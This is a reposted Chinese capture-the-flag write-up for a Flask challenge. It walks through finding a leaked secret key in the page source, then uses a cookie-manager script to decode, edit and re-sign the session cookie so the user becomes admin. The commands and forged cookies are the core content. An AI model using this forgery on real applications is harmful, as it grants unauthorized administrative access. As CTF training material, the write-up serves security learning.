国家信用信息公示系统湖北_网页制作软件免费吗_关键词规划师_免费打广告平台有哪些

时间:2025/8/4 16:21:09来源：https://blog.csdn.net/2301_79469341/article/details/144518663 浏览次数: 0次

jwt

题目练习

[NSSRound#13 Basic]flask?jwt?

进入后是一个注册登录页面，然后有忘记密码功能(源码里面有提示:!-- secretkey: th3f1askisfunny -->)，猜测是jwt，登录进去之后getflag时要是admin

用bp抓包getflag，得到一段session

.eJwljjsOwyAQBe9CnWJ_LMaXsXiwKGntuIpy9yClHY1G80nHPON6pv193vFIx2ukPSm4Qp2t5IiqTXSGNpdQoG9VvFsZZBZDczYoD6NGvZizEgeXukFpUpMh0TCdCESrJAJfqFuODOk1fKWXZwwgolNj2QhpjdxXnP8bS98flTovTw.Zrqbcw.XmmbR3W_6SDofQc2AnvLvvWdN7k

使用脚本解密

python flask_session_cookie_manager3.py -s "th3f1askisfunny" -c ".eJwljjsOwyAQBe9CnWJ_LMaXsXiwKGntuIpy9yClHY1G80nHPON6pv193vFIx2ukPSm4Qp2t5IiqTXSGNpdQoG9VvFsZZBZDczYoD6NGvZizEgeXukFpUpMh0TCdCESrJAJfqFuODOk1fKWXZwwgolNj2QhpjdxXnP8bS98flTovTw.Zrqbcw.XmmbR3W_6SDofQc2AnvLvvWdN7k"

得到解密内容：

{'_fresh': True, '_id': '3b19b361475ee93a23fe3a62e3bbc8926c47d044ed3554b31d40a0c7461301e1798b30f0a2d2eabf600b00e9322b6d2ec45e5b2c9e623ff0a41bbbeec0a1280b', '_user_id': '4'}

猜测admin的_user_id是1，将其修改为1之后加密：

python flask_session_cookie_manager3.py encode -s"th3f1askisfunny" -t "{'_fresh': True, '_id': '3b19b361475ee93a23fe3a62e3bbc8926c47d044ed3554b31d40a0c7461301e1798b30f0a2d2eabf600b00e9322b6d2ec45e5b2c9e623ff0a41bbbeec0a1280b', '_user_id': '1'}"

得到的加密session:

.eJwljjsOwyAQBe9CnWJ_LMaXsXiwKGntuIpy9yClHY1G80nHPON6pv193vFIx2ukPSm4Qp2t5IiqTXSGNpdQoG9VvFsZZBZDczYoD6NGvZizEgeXukFpUpMh0TCdCESrJAJfqFuODOk1fKWXZwwgolNj2QhpjdxXnP8bTt8flTEvTA.ZrqfFg.wx-hbPKA50GmyVvzOlO7cufCt_A

替换原来的session即可

关键字：国家信用信息公示系统湖北_网页制作软件免费吗_关键词规划师_免费打广告平台有哪些

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com

责任编辑：